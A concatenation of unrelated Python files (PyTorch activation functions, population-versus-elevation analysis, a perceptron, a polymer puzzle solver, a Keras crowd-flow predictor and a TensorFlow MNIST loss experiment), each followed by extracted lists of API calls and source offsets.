if not tensor.size(1) % 2 == 0:
raise ValueError("MaxOut: tensor.size(1) must be divisible by n_splits"
": {}".format(tensor.size(1)))
return torch.max(*tensor.split(tensor.size(1)//2, 1))
class Activations(nn.Module):
r"""Activation functions. Additional activation functions (other than those
available in pytorch) are
:obj:`"hsigm"` & :obj:`"hswish"` (`"Searching for MobileNetV3"
<https://arxiv.org/pdf/1905.02244>`_),
:obj:`"maxo"` (`"Maxout Networks" <https://arxiv.org/pdf/1302.4389>`_),
:obj:`"mish"` (`"Mish: A Self Regularized Non-Monotonic Neural Activation
Function" <https://arxiv.org/pdf/1908.08681v1>`_),
:obj:`"squash"` (`"Dynamic Routing Between Capsules"
<https://arxiv.org/abs/1710.09829>`_) and
:obj:`"swish"` (`"SWISH: A Self-Gated Activation Function"
<https://arxiv.org/pdf/1710.05941v1>`_).
Args:
tensor_size (tuple, required): Input tensor shape in BCHW
(None/any integer >0, channels, height, width).
activation (str, optional): The list of activation options are
:obj:`"elu"`, :obj:`"gelu"`, :obj:`"hsigm"`, :obj:`"hswish"`,
:obj:`"lklu"`, :obj:`"maxo"`, :obj:`"mish"`, :obj:`"prelu"`,
:obj:`"relu"`, :obj:`"relu6"`, :obj:`"rmxo"`, :obj:`"selu"`,
:obj:`"sigm"`, :obj:`"squash"`, :obj:`"swish"`, :obj:`"tanh"`.
(default: :obj:`"relu"`)
elu_alpha (float, optional): (default: :obj:`1.0`)
lklu_negslope (float, optional): (default: :obj:`0.01`)
.. code-block:: python
import torch
import tensormonk
print(tensormonk.activations.Activations.METHODS)
tensor_size = (None, 16, 4, 4)
activation = "maxo"
maxout = tensormonk.activations.Activations(tensor_size, activation)
maxout(torch.randn(1, *tensor_size[1:]))
tensor_size = (None, 16, 4)
activation = "squash"
squash = tensormonk.activations.Activations(tensor_size, activation)
squash(torch.randn(1, *tensor_size[1:]))
tensor_size = (None, 16)
activation = "swish"
swish = tensormonk.activations.Activations(tensor_size, activation)
swish(torch.randn(1, *tensor_size[1:]))
"""
METHODS = ["elu", "gelu", "hsigm", "hswish", "lklu", "maxo", "mish",
"prelu", "relu", "relu6", "rmxo",
"selu", "sigm", "squash", "swish", "tanh"]
def __init__(self, tensor_size: tuple, activation: str = "relu", **kwargs):
super(Activations, self).__init__()
if activation is not None:
activation = activation.lower()
self.t_size = tensor_size
self.activation = activation
self.function = None
if activation not in self.METHODS:
raise ValueError("activation: Invalid activation " +
"/".join(self.METHODS) +
": {}".format(activation))
self.function = getattr(self, "_" + activation)
if activation == "prelu":
self.weight = nn.Parameter(torch.ones(1) * 0.1)
if activation == "lklu":
self.negslope = kwargs["lklu_negslope"] if "lklu_negslope" in \
kwargs.keys() else 0.01
if activation == "elu":
self.alpha = kwargs["elu_alpha"] if "elu_alpha" in \
kwargs.keys() else 1.0
self.tensor_size = tensor_size
if activation in ("maxo", "rmxo"):
t_size = list(tensor_size)
t_size[1] = t_size[1] // 2
self.tensor_size = tuple(t_size)
def forward(self, tensor: torch.Tensor) -> torch.Tensor:
if self.function is None:
return tensor
return self.function(tensor)
def _relu(self, tensor: torch.Tensor):
return F.relu(tensor)
def _relu6(self, tensor: torch.Tensor):
return F.relu6(tensor)
def _lklu(self, tensor: torch.Tensor):
return F.leaky_relu(tensor, self.negslope)
def _elu(self, tensor: torch.Tensor):
return F.elu(tensor, self.alpha)
def _gelu(self, tensor: torch.Tensor):
return F.gelu(tensor)
def _prelu(self, tensor: torch.Tensor):
return F.prelu(tensor, self.weight)
def _selu(self, tensor: torch.Tensor):
return F.selu(tensor)
def _tanh(self, tensor: torch.Tensor):
return torch.tanh(tensor)
def _sigm(self, tensor: torch.Tensor):
return torch.sigmoid(tensor)
def _maxo(self, tensor: torch.Tensor):
if not tensor.size(1) % 2 == 0:
raise ValueError("MaxOut: tensor.size(1) must be divisible by 2"
": {}".format(tensor.size(1)))
return torch.max(*tensor.split(tensor.size(1)//2, 1))
def _rmxo(self, tensor: torch.Tensor):
return self._maxo(F.relu(tensor))
def _swish(self, tensor: torch.Tensor):
return tensor * torch.sigmoid(tensor)
def _mish(self, tensor: torch.Tensor):
return tensor * F.softplus(tensor).tanh()
def _squash(self, tensor: torch.Tensor):
if not tensor.dim() == 3:
raise ValueError("Squash requires 3D tensors: {}".format(
tensor.dim()))
sum_squares = (tensor ** 2).sum(2, True)
return (sum_squares/(1+sum_squares)) * tensor / sum_squares.pow(0.5)
def _hsigm(self, tensor: torch.Tensor):
return F.relu6(tensor + 3) / 6
def _hswish(self, tensor: torch.Tensor):
return self._hsigm(tensor) * tensor
def __repr__(self):
return self.activation
@staticmethod
def available() -> list:
return Activations.METHODS
def flops(self) -> int:
import numpy as np
flops = 0
numel = np.prod(self.t_size[1:])
if self.activation == "elu":
# max(0, x) + min(0, alpha*(exp(x)-1))
flops = numel * 5
elif self.activation in ("lklu", "prelu", "sigm"):
flops = numel * 3
elif self.activation == "maxo":
# torch.max(*x.split(x.size(1)//2, 1))
flops = numel / 2
elif self.activation == "mish":
# x * tanh(ln(1 + e^x))
flops = numel * 5
elif self.activation == "relu":
# max(0, x)
flops = numel
elif self.activation == "relu6":
# min(6, max(0, x))
flops = numel * 2
elif self.activation == "rmxo":
# maxo(relu(x))
flops = int(numel * 1.5)
elif self.activation == "squash":
# sum_squares = (tensor**2).sum(2, True)
# (sum_squares/(1+sum_squares)) * tensor / sum_squares.pow(0.5)
flops = numel * 4 + self.t_size[1] * 2
elif self.activation == "swish":
# x * sigm(x)
flops = numel * 4
elif self.activation == "tanh":
# (exp(x) - exp(-x)) / (exp(x) + exp(-x))
flops = numel * 9
elif self.activation == "hsigm":
# min(6, max(0, x + 3)) / 6
flops = numel * 4
elif self.activation == "hswish":
# x * min(6, max(0, x + 3)) / 6
flops = numel * 8
return flops
|
[
"torch.ones",
"torch.nn.functional.selu",
"torch.nn.functional.prelu",
"torch.nn.functional.relu6",
"torch.nn.functional.gelu",
"torch.sigmoid",
"torch.nn.functional.leaky_relu",
"torch.nn.functional.relu",
"torch.nn.functional.elu",
"torch.nn.functional.softplus",
"numpy.prod",
"torch.tanh"
] |
[((4037, 4051), 'torch.nn.functional.relu', 'F.relu', (['tensor'], {}), '(tensor)\n', (4043, 4051), True, 'import torch.nn.functional as F\n'), ((4112, 4127), 'torch.nn.functional.relu6', 'F.relu6', (['tensor'], {}), '(tensor)\n', (4119, 4127), True, 'import torch.nn.functional as F\n'), ((4187, 4222), 'torch.nn.functional.leaky_relu', 'F.leaky_relu', (['tensor', 'self.negslope'], {}), '(tensor, self.negslope)\n', (4199, 4222), True, 'import torch.nn.functional as F\n'), ((4281, 4306), 'torch.nn.functional.elu', 'F.elu', (['tensor', 'self.alpha'], {}), '(tensor, self.alpha)\n', (4286, 4306), True, 'import torch.nn.functional as F\n'), ((4366, 4380), 'torch.nn.functional.gelu', 'F.gelu', (['tensor'], {}), '(tensor)\n', (4372, 4380), True, 'import torch.nn.functional as F\n'), ((4441, 4469), 'torch.nn.functional.prelu', 'F.prelu', (['tensor', 'self.weight'], {}), '(tensor, self.weight)\n', (4448, 4469), True, 'import torch.nn.functional as F\n'), ((4529, 4543), 'torch.nn.functional.selu', 'F.selu', (['tensor'], {}), '(tensor)\n', (4535, 4543), True, 'import torch.nn.functional as F\n'), ((4603, 4621), 'torch.tanh', 'torch.tanh', (['tensor'], {}), '(tensor)\n', (4613, 4621), False, 'import torch\n'), ((4681, 4702), 'torch.sigmoid', 'torch.sigmoid', (['tensor'], {}), '(tensor)\n', (4694, 4702), False, 'import torch\n'), ((5967, 5991), 'numpy.prod', 'np.prod', (['self.t_size[1:]'], {}), '(self.t_size[1:])\n', (5974, 5991), True, 'import numpy as np\n'), ((5056, 5070), 'torch.nn.functional.relu', 'F.relu', (['tensor'], {}), '(tensor)\n', (5062, 5070), True, 'import torch.nn.functional as F\n'), ((5141, 5162), 'torch.sigmoid', 'torch.sigmoid', (['tensor'], {}), '(tensor)\n', (5154, 5162), False, 'import torch\n'), ((5624, 5643), 'torch.nn.functional.relu6', 'F.relu6', (['(tensor + 3)'], {}), '(tensor + 3)\n', (5631, 5643), True, 'import torch.nn.functional as F\n'), ((3307, 3320), 'torch.ones', 'torch.ones', (['(1)'], {}), '(1)\n', (3317, 3320), False, 'import torch\n'), ((5231, 5249), 'torch.nn.functional.softplus', 'F.softplus', (['tensor'], {}), '(tensor)\n', (5241, 5249), True, 'import torch.nn.functional as F\n')]
|
from sedac_gpw_parser import population
import numpy as np
from matplotlib import pyplot as plt
import matplotlib.colors as colors
import os
file_lons = np.arange(-180, 180, 40)
file_lats = np.arange(90, -20, -50)
DATA_FOLDER = os.path.expanduser("~") + "/.srtm30/"
def get_population_data(country_id):
pop = population.Population(country_id=country_id)
pop.mask_invalid_data(below=0)
data = pop.population_array()
lat = pop.latitude_range()
lon = pop.longitude_range()
lonmin = lon.min()
lonmax = lon.max()
latmax = lat.max()
latmin = lat.min()
extent = (lonmin, lonmax, latmin, latmax)
return data, extent
def get_infiles(lonmin, lonmax, latmin, latmax):
print(lonmin, lonmax, latmin, latmax)
lonmask = (file_lons >= (lonmin - 40)) & (file_lons <= lonmax)
latmask = (file_lats >= latmin) & (file_lats <= (latmax + 50))
valid_lons = file_lons[lonmask]
valid_lats = file_lats[latmask]
latmax = np.round(latmax + 1/120, 8) # Add 1/120 because topographic data is with respect to UPPER LEFT corner
latmin = np.round(latmin + 1/120, 8) # Add 1/120 because topographic data is with respect to UPPER LEFT corner
lonmin = np.round(lonmin, 8)
lonmax = np.round(lonmax, 8)
n_lat = int(np.round((latmax - latmin) * 120) + 1)
n_lon = int(np.round((lonmax - lonmin) * 120) + 1)
full_data = np.zeros((n_lat, n_lon))
lat_offset = 0
for valid_lat in valid_lats:
#print(valid_lat, end="\r")
file_lat_range = np.round(np.arange(valid_lat, valid_lat-50, -1/120), 8)
valid_file_lat_range = (file_lat_range <= latmax) & (file_lat_range >= latmin)
n_row = valid_file_lat_range.sum()
lon_offset = 0
for valid_lon in valid_lons:
file_lon_range = np.round(np.arange(valid_lon, valid_lon+40, +1/120), 8)
valid_file_lon_range = (file_lon_range <= lonmax) & (file_lon_range >= lonmin)
n_col = valid_file_lon_range.sum()
if valid_lon < 0:
lon_pref = "W"
else:
lon_pref = "E"
if valid_lat < 0:
lat_pref = "S"
else:
lat_pref = "N"
infile = lon_pref + str(abs(valid_lon)).zfill(3) + lat_pref + str(abs(valid_lat)).zfill(2) + ".DEM"
with open(DATA_FOLDER+infile) as infile:
data = np.fromfile(infile, np.dtype('>i2')).reshape(6000, 4800)
print(valid_lat, valid_lon, "cutting data")
data = data[valid_file_lat_range]
data = data[:, valid_file_lon_range]
print("storing data")
full_data[lat_offset:lat_offset+n_row,lon_offset:lon_offset+n_col]=data
lon_offset += n_col
del data
lat_offset += n_row
return full_data
def truncate_colormap(cmap, minval=0.25, maxval=1.0, n=100):
new_cmap = colors.LinearSegmentedColormap.from_list(
'trunc({n},{a:.2f},{b:.2f})'.format(n=cmap.name, a=minval, b=maxval),
cmap(np.linspace(minval, maxval, n)))
return new_cmap
def get_topomap():
colors_undersea = plt.cm.terrain(np.linspace(0, 0.17, 2))
colors_land = plt.cm.terrain(np.linspace(0.25, 1, 256))
all_colors = np.vstack((colors_undersea, colors_land))
terrain_map = colors.LinearSegmentedColormap.from_list('terrain_map', all_colors)
terrain_map = truncate_colormap(cmap=plt.get_cmap('terrain'))
terrain_map.set_under("#254DB3")
terrain_map.set_bad("0.5")
return terrain_map
def main(country_id, plot=True):
pop, extent = get_population_data(country_id=country_id)
lonmin, lonmax, latmin, latmax = extent
print("Getting topography data from disk...")
topo_data = get_infiles(lonmin, lonmax, latmin, latmax)
print("Removing empty cols")
contains_values = []
for col_id in range(pop.shape[1]):
print(col_id, pop.shape[1], end="\r")
if np.isfinite(pop[:, col_id]).any():
contains_values.append(col_id)
print(len(contains_values), pop.shape)
pop = pop[:, contains_values]
topo_data = topo_data[:, contains_values]
print("Removing empty rows")
contains_values = []
for row_id in range(pop.shape[0]):
print(row_id, pop.shape[1], end="\r")
if np.isfinite(pop[row_id]).any():
contains_values.append(row_id)
print(len(contains_values), pop.shape)
pop = pop[contains_values]
topo_data = topo_data[contains_values]
print("setting invalid values...")
#for i, _pop in enumerate(pop):
# print(i, len(pop), end="\r")
topo_data[np.isnan(pop)] = np.nan
print("Total population:", np.nansum(pop))
if plot:
f, (ax1, ax2) = plt.subplots(1, 2, figsize=(12, 9))
terrain_map = get_topomap()
ax1.imshow(topo_data, vmin=0, vmax=4000, cmap=terrain_map, rasterized=True)
ax2.imshow(pop, vmin=0, vmax=50)
plt.savefig("pop_topo.png")
return pop, topo_data
def distribution(pop, topo, return_total=False, plot=True, resolution=500,
max_elevation=20, add_noise=True):
mask = np.isfinite(topo)
topo = topo[mask]
pop = pop[mask]
# Make sure that some artifacts where elevation is negative are set to zero
topo[topo <= 0] = 0
#topo[topo == 0] += 0.5 * np.random.random((topo == 0).sum())
#topo[topo >= 0.5] += np.random.random((topo >= 0.5).sum()) - 0.5
if add_noise:
topo+= np.random.random(len(topo))
valid_topo = np.linspace(0, max_elevation, resolution)
results = np.zeros_like(valid_topo, dtype=float)
#total_population = pop.total_population()
for i, elevation in enumerate(valid_topo):
mask = topo <= elevation
#mask = topo == elevation
results[i] = pop[mask].sum()
total_population = np.sum(pop)
results /= total_population
#results = results.cumsum() / total_population
if plot:
f = plt.figure()
#plt.semilogy()
plt.plot(valid_topo, results)
plt.xlabel("Elevation x [m above sea level]")
plt.ylabel("Share of population living at or below x")
plt.savefig("population_elevation.png")
if return_total:
return valid_topo, results, total_population
else:
return valid_topo, results
if __name__ == "__main__":
pop, topo = main(840, plot=True)
distribution(pop, topo, plot=True)
|
[
"numpy.sum",
"numpy.isnan",
"matplotlib.pyplot.figure",
"numpy.arange",
"numpy.round",
"matplotlib.colors.LinearSegmentedColormap.from_list",
"numpy.zeros_like",
"numpy.isfinite",
"numpy.linspace",
"matplotlib.pyplot.subplots",
"numpy.nansum",
"matplotlib.pyplot.get_cmap",
"matplotlib.pyplot.ylabel",
"numpy.vstack",
"matplotlib.pyplot.plot",
"numpy.dtype",
"numpy.zeros",
"matplotlib.pyplot.xlabel",
"os.path.expanduser",
"matplotlib.pyplot.savefig",
"sedac_gpw_parser.population.Population"
] |
[((154, 178), 'numpy.arange', 'np.arange', (['(-180)', '(180)', '(40)'], {}), '(-180, 180, 40)\n', (163, 178), True, 'import numpy as np\n'), ((191, 214), 'numpy.arange', 'np.arange', (['(90)', '(-20)', '(-50)'], {}), '(90, -20, -50)\n', (200, 214), True, 'import numpy as np\n'), ((229, 252), 'os.path.expanduser', 'os.path.expanduser', (['"""~"""'], {}), "('~')\n", (247, 252), False, 'import os\n'), ((320, 364), 'sedac_gpw_parser.population.Population', 'population.Population', ([], {'country_id': 'country_id'}), '(country_id=country_id)\n', (341, 364), False, 'from sedac_gpw_parser import population\n'), ((993, 1022), 'numpy.round', 'np.round', (['(latmax + 1 / 120)', '(8)'], {}), '(latmax + 1 / 120, 8)\n', (1001, 1022), True, 'import numpy as np\n'), ((1108, 1137), 'numpy.round', 'np.round', (['(latmin + 1 / 120)', '(8)'], {}), '(latmin + 1 / 120, 8)\n', (1116, 1137), True, 'import numpy as np\n'), ((1223, 1242), 'numpy.round', 'np.round', (['lonmin', '(8)'], {}), '(lonmin, 8)\n', (1231, 1242), True, 'import numpy as np\n'), ((1256, 1275), 'numpy.round', 'np.round', (['lonmax', '(8)'], {}), '(lonmax, 8)\n', (1264, 1275), True, 'import numpy as np\n'), ((1404, 1428), 'numpy.zeros', 'np.zeros', (['(n_lat, n_lon)'], {}), '((n_lat, n_lon))\n', (1412, 1428), True, 'import numpy as np\n'), ((3346, 3387), 'numpy.vstack', 'np.vstack', (['(colors_undersea, colors_land)'], {}), '((colors_undersea, colors_land))\n', (3355, 3387), True, 'import numpy as np\n'), ((3406, 3473), 'matplotlib.colors.LinearSegmentedColormap.from_list', 'colors.LinearSegmentedColormap.from_list', (['"""terrain_map"""', 'all_colors'], {}), "('terrain_map', all_colors)\n", (3446, 3473), True, 'import matplotlib.colors as colors\n'), ((5255, 5272), 'numpy.isfinite', 'np.isfinite', (['topo'], {}), '(topo)\n', (5266, 5272), True, 'import numpy as np\n'), ((5637, 5678), 'numpy.linspace', 'np.linspace', (['(0)', 'max_elevation', 'resolution'], {}), '(0, max_elevation, resolution)\n', (5648, 5678), True, 'import numpy as np\n'), ((5693, 5731), 'numpy.zeros_like', 'np.zeros_like', (['valid_topo'], {'dtype': 'float'}), '(valid_topo, dtype=float)\n', (5706, 5731), True, 'import numpy as np\n'), ((5971, 5982), 'numpy.sum', 'np.sum', (['pop'], {}), '(pop)\n', (5977, 5982), True, 'import numpy as np\n'), ((3244, 3267), 'numpy.linspace', 'np.linspace', (['(0)', '(0.17)', '(2)'], {}), '(0, 0.17, 2)\n', (3255, 3267), True, 'import numpy as np\n'), ((3302, 3327), 'numpy.linspace', 'np.linspace', (['(0.25)', '(1)', '(256)'], {}), '(0.25, 1, 256)\n', (3313, 3327), True, 'import numpy as np\n'), ((4722, 4735), 'numpy.isnan', 'np.isnan', (['pop'], {}), '(pop)\n', (4730, 4735), True, 'import numpy as np\n'), ((4778, 4792), 'numpy.nansum', 'np.nansum', (['pop'], {}), '(pop)\n', (4787, 4792), True, 'import numpy as np\n'), ((4836, 4871), 'matplotlib.pyplot.subplots', 'plt.subplots', (['(1)', '(2)'], {'figsize': '(12, 9)'}), '(1, 2, figsize=(12, 9))\n', (4848, 4871), True, 'from matplotlib import pyplot as plt\n'), ((5059, 5086), 'matplotlib.pyplot.savefig', 'plt.savefig', (['"""pop_topo.png"""'], {}), "('pop_topo.png')\n", (5070, 5086), True, 'from matplotlib import pyplot as plt\n'), ((6093, 6105), 'matplotlib.pyplot.figure', 'plt.figure', ([], {}), '()\n', (6103, 6105), True, 'from matplotlib import pyplot as plt\n'), ((6134, 6163), 'matplotlib.pyplot.plot', 'plt.plot', (['valid_topo', 'results'], {}), '(valid_topo, results)\n', (6142, 6163), True, 'from matplotlib import pyplot as plt\n'), ((6172, 6217), 'matplotlib.pyplot.xlabel', 'plt.xlabel', (['"""Elevation x [m above sea level]"""'], {}), "('Elevation x [m above sea level]')\n", (6182, 6217), True, 'from matplotlib import pyplot as plt\n'), ((6226, 6280), 'matplotlib.pyplot.ylabel', 'plt.ylabel', (['"""Share of population living at or below x"""'], {}), "('Share of population living at or below x')\n", (6236, 6280), True, 'from matplotlib import pyplot as plt\n'), ((6289, 6328), 'matplotlib.pyplot.savefig', 'plt.savefig', (['"""population_elevation.png"""'], {}), "('population_elevation.png')\n", (6300, 6328), True, 'from matplotlib import pyplot as plt\n'), ((1293, 1326), 'numpy.round', 'np.round', (['((latmax - latmin) * 120)'], {}), '((latmax - latmin) * 120)\n', (1301, 1326), True, 'import numpy as np\n'), ((1348, 1381), 'numpy.round', 'np.round', (['((lonmax - lonmin) * 120)'], {}), '((lonmax - lonmin) * 120)\n', (1356, 1381), True, 'import numpy as np\n'), ((1558, 1604), 'numpy.arange', 'np.arange', (['valid_lat', '(valid_lat - 50)', '(-1 / 120)'], {}), '(valid_lat, valid_lat - 50, -1 / 120)\n', (1567, 1604), True, 'import numpy as np\n'), ((3133, 3163), 'numpy.linspace', 'np.linspace', (['minval', 'maxval', 'n'], {}), '(minval, maxval, n)\n', (3144, 3163), True, 'import numpy as np\n'), ((3516, 3539), 'matplotlib.pyplot.get_cmap', 'plt.get_cmap', (['"""terrain"""'], {}), "('terrain')\n", (3528, 3539), True, 'from matplotlib import pyplot as plt\n'), ((1847, 1893), 'numpy.arange', 'np.arange', (['valid_lon', '(valid_lon + 40)', '(+1 / 120)'], {}), '(valid_lon, valid_lon + 40, +1 / 120)\n', (1856, 1893), True, 'import numpy as np\n'), ((4044, 4071), 'numpy.isfinite', 'np.isfinite', (['pop[:, col_id]'], {}), '(pop[:, col_id])\n', (4055, 4071), True, 'import numpy as np\n'), ((4401, 4425), 'numpy.isfinite', 'np.isfinite', (['pop[row_id]'], {}), '(pop[row_id])\n', (4412, 4425), True, 'import numpy as np\n'), ((2488, 2503), 'numpy.dtype', 'np.dtype', (['""">i2"""'], {}), "('>i2')\n", (2496, 2503), True, 'import numpy as np\n')]
|
from __future__ import division, print_function
from typing import List, Tuple, Callable
import numpy as np
import scipy
import matplotlib.pyplot as plt
class Perceptron:
def __init__(self, nb_features=2, max_iteration=10, margin=1e-4):
'''
Args :
nb_features : Number of features
max_iteration : maximum iterations. You algorithm should terminate after this
many iterations even if it is not converged
margin is the min value, we use this instead of comparing with 0 in the algorithm
'''
self.nb_features = nb_features
self.w = [0 for i in range(0,nb_features+1)]
self.margin = margin
self.max_iteration = max_iteration
def train(self, features: List[List[float]], labels: List[int]) -> bool:
'''
Args :
features : List of features. First element of each feature vector is 1
to account for bias
labels : label of each feature [-1,1]
Returns :
True/ False : return True if the algorithm converges else False.
'''
seq = [x for x in range(len(features))]
threshold = self.margin / 2
converge = False
scale = np.linalg.norm(features)
for iteration in range(self.max_iteration):
if converge:
break
converge = True
np.random.shuffle(seq)
for i in seq:
pred = np.dot(self.w, features[i])
y = 0
if pred > threshold:
y = 1
elif pred < -threshold:
y = -1
if y != labels[i]:
self.w = np.add(self.w, np.dot(labels[i], features[i]))
converge = False
self.w = self.w.tolist()
return converge
def reset(self):
self.w = [0 for i in range(0,self.nb_features+1)]
def predict(self, features: List[List[float]]) -> List[int]:
'''
Args :
features : List of features. First element of each feature vector is 1
to account for bias
Returns :
labels : List of integers of [-1,1]
'''
return np.apply_along_axis(lambda x : 1 if np.dot(self.w, x) > 0 else -1, 1, features)
def get_weights(self) -> List[float]:
return self.w
|
[
"numpy.dot",
"numpy.linalg.norm",
"numpy.random.shuffle"
] |
[((1280, 1304), 'numpy.linalg.norm', 'np.linalg.norm', (['features'], {}), '(features)\n', (1294, 1304), True, 'import numpy as np\n'), ((1444, 1466), 'numpy.random.shuffle', 'np.random.shuffle', (['seq'], {}), '(seq)\n', (1461, 1466), True, 'import numpy as np\n'), ((1516, 1543), 'numpy.dot', 'np.dot', (['self.w', 'features[i]'], {}), '(self.w, features[i])\n', (1522, 1543), True, 'import numpy as np\n'), ((1775, 1805), 'numpy.dot', 'np.dot', (['labels[i]', 'features[i]'], {}), '(labels[i], features[i])\n', (1781, 1805), True, 'import numpy as np\n'), ((2360, 2377), 'numpy.dot', 'np.dot', (['self.w', 'x'], {}), '(self.w, x)\n', (2366, 2377), True, 'import numpy as np\n')]
|
import numpy as np
import os
import time
np.set_printoptions(threshold=np.inf)
def input(fname):
day_dir = os.path.realpath(__file__).split('/')[:-1]
fname = os.path.join('/',*day_dir, fname)
data = []
with open(fname) as f:
for line in f:
data.append(line.strip())
return data
def count_ele(pairs):
elem_count = {e: 0 for e in rules.values()}
for pair in pairs:
elem_count[pair[0][0]] += 0.5*pair[1]
elem_count[pair[0][1]] += 0.5*pair[1]
elem_count[seed[0]] += 0.5
elem_count[seed[-1]] += 0.5
return elem_count
def do_steps(pairs, rules, n):
for i in range(n):
new_pairs = []
for pair in pairs:
insertion = rules[pair[0]]
new_pairs.extend([(pair[0][0]+insertion, pair[1]), (insertion+pair[0][1], pair[1])])
counts = {p: 0 for p in set(np.array(new_pairs)[:,0])}
for n in new_pairs:
counts[n[0]] += n[1]
pairs = [(p, counts[p]) for p in counts]
elem_count = count_ele(pairs)
min_ele = min(elem_count, key=elem_count.get)
max_ele = max(elem_count, key=elem_count.get)
print(int(elem_count[max_ele] - elem_count[min_ele]))
rules = input('input.txt')
# rules = input('test-input.txt')
seed = rules[0]
rules = {d.split(' ')[0]: d.split(' ')[2] for d in rules[2:]}
unique_pairs = set([seed[i]+seed[i+1] for i in range(len(seed)-1)])
pairs = [(p, list(unique_pairs).count(p)) for p in unique_pairs]
# part 1
t0 = time.time()
print('Part 1:')
do_steps(pairs, rules, 10)
print('Elapsed time:',time.time()-t0,' sec')
# part 2
t0 = time.time()
print('\nPart 2:')
do_steps(pairs, rules, 40)
print('Elapsed time:',time.time()-t0,' sec')
|
[
"numpy.set_printoptions",
"os.path.realpath",
"time.time",
"numpy.array",
"os.path.join"
] |
[((42, 79), 'numpy.set_printoptions', 'np.set_printoptions', ([], {'threshold': 'np.inf'}), '(threshold=np.inf)\n', (61, 79), True, 'import numpy as np\n'), ((1513, 1524), 'time.time', 'time.time', ([], {}), '()\n', (1522, 1524), False, 'import time\n'), ((1629, 1640), 'time.time', 'time.time', ([], {}), '()\n', (1638, 1640), False, 'import time\n'), ((168, 202), 'os.path.join', 'os.path.join', (['"""/"""', '*day_dir', 'fname'], {}), "('/', *day_dir, fname)\n", (180, 202), False, 'import os\n'), ((1591, 1602), 'time.time', 'time.time', ([], {}), '()\n', (1600, 1602), False, 'import time\n'), ((1709, 1720), 'time.time', 'time.time', ([], {}), '()\n', (1718, 1720), False, 'import time\n'), ((113, 139), 'os.path.realpath', 'os.path.realpath', (['__file__'], {}), '(__file__)\n', (129, 139), False, 'import os\n'), ((884, 903), 'numpy.array', 'np.array', (['new_pairs'], {}), '(new_pairs)\n', (892, 903), True, 'import numpy as np\n')]
|
from keras.models import load_model
# from matplotlib.font_manager import FontProperties
import cv2
import numpy as np
import exptBikeNYC
size =10
model = exptBikeNYC.build_model(False)
model.load_weights('MODEL/c3.p3.t3.resunit4.lr0.0002.best.h5')
f = open("area.csv", "r")
# 临时存储某时间的人数
person_num = []
# 存储各时间的人数尺寸(n,3,3)
imgs = []
i, l = 0, 0
for line in f:
l += 1
if l == 1:
continue
i += 1
line = line.strip().split(',')
# 将人数转化为小于1的数,后面求实际人数需转化过来
number = (float(line[2]) - 0) / (3073 - 0) * 2 - 1
person_num.append(number)
# 每次读16个数据
if i % (128) == 0:
# 转化成一维数组
person_num = np.array(person_num)
# 改变形状,类似图像形式
person_num = person_num.reshape(16, 8)
imgs.append(person_num)
i = 0
person_num = []
# 训练数据(输入三种类型的数据,并各自转化为多通道形式)
train_x1, train_x2, train_x3, train_y = [], [], [], []
for i in range(1300, 1305):
# 取短期、周期、趋势三组件数据,各不同长度序列
image1 = [imgs[i - 3], imgs[i - 2], imgs[i - 1]]
image2 = [imgs[i - 72], imgs[i - 48], imgs[i - 24]]
image3 = [imgs[i - 484], imgs[i - 336], imgs[i - 168]]
train_x1.append(image1)
train_x2.append(image2)
train_x3.append(image3)
lab = [imgs[i]]
train_y.append(lab) # 最终输出
train_x = [np.array(train_x1), np.array(train_x2), np.array(train_x3)]
train_y = np.array(train_y)
# X_test, Y_test=exptBikeNYC.main()
predict_y = model.predict(train_x)
print((train_y+1)/2*3073)
print(((predict_y+1)/2*3073).astype(int))
# print((predict_y*(60923+192687)-192687))
|
[
"exptBikeNYC.build_model",
"numpy.array"
] |
[((156, 186), 'exptBikeNYC.build_model', 'exptBikeNYC.build_model', (['(False)'], {}), '(False)\n', (179, 186), False, 'import exptBikeNYC\n'), ((1330, 1347), 'numpy.array', 'np.array', (['train_y'], {}), '(train_y)\n', (1338, 1347), True, 'import numpy as np\n'), ((1260, 1278), 'numpy.array', 'np.array', (['train_x1'], {}), '(train_x1)\n', (1268, 1278), True, 'import numpy as np\n'), ((1280, 1298), 'numpy.array', 'np.array', (['train_x2'], {}), '(train_x2)\n', (1288, 1298), True, 'import numpy as np\n'), ((1300, 1318), 'numpy.array', 'np.array', (['train_x3'], {}), '(train_x3)\n', (1308, 1318), True, 'import numpy as np\n'), ((646, 666), 'numpy.array', 'np.array', (['person_num'], {}), '(person_num)\n', (654, 666), True, 'import numpy as np\n')]
|
import tensorflow as tf
import numpy as np
from tensorflow.examples.tutorials.mnist import input_data
from datetime import datetime
LOGDIR = '/tmp/17springAI/mnist/objectiveFunc/' + datetime.now().strftime('%Y%m%d-%H%M%S') + '/'
def activation(act_func, logit):
if act_func == "relu":
return tf.nn.relu(logit)
else:
return tf.nn.sigmoid(logit)
def logits(input, size_in, size_out):
w = tf.Variable(tf.truncated_normal([size_in, size_out], stddev=0.1), name="W")
b = tf.Variable(tf.constant(0.1, shape=[size_out]), name="B")
logit = (tf.matmul(input, w) + b)
tf.summary.histogram("weights", w)
tf.summary.histogram("biases", b)
tf.summary.histogram("logits", logit)
return logit, w, b
# fully conected layer
def fc_layer(input, size_in, size_out,act_func, name="fc" ):
with tf.name_scope(name):
logit, w, b = logits(input, size_in, size_out)
act = activation(act_func, logit)
tf.summary.histogram("weights", w)
tf.summary.histogram("biases", b)
tf.summary.histogram("activations", act)
return act, w, b
# runs different model each time, hparam is a string specification for the model
# hpram is also used in the created tensorboard summary
def mnist_model(learning_rate, objectiveFunc, hparam, act_func):
tf.reset_default_graph()
sess = tf.InteractiveSession(config=tf.ConfigProto(gpu_options=tf.GPUOptions(per_process_gpu_memory_fraction=0.4)))
# input layer
x = tf.placeholder(tf.float32, [None, 784], name="x")
x_image = tf.reshape(x, [-1, 28, 28, 1])
# to view images on tensorboard
tf.summary.image('input', x_image, 3)
# label to compare
y_ = tf.placeholder(tf.float32, [None, 10], name="labels")
keep_prob = tf.placeholder(tf.float32)
h1, W1, B1 = fc_layer(x, 784, 100, act_func, "h1")
logit, W2, B2 = logits(h1, 100, 10)
Y = tf.nn.softmax(logit)
## changing loss function
if objectiveFunc == "mean_sq_err":
with tf.name_scope("mean_sq_err"):
mean_sq_err = tf.reduce_mean(tf.contrib.keras.losses.mean_squared_error(Y, y_))
tf.summary.scalar("mean_sq_err", mean_sq_err)
loss = mean_sq_err
elif objectiveFunc == "L2_norm":
with tf.name_scope("L2_norm"):
xent = tf.reduce_mean(
tf.nn.softmax_cross_entropy_with_logits(
logits=logit, labels=y_), name="xent")
L2_lambda = 0.05
L2_norm = xent + \
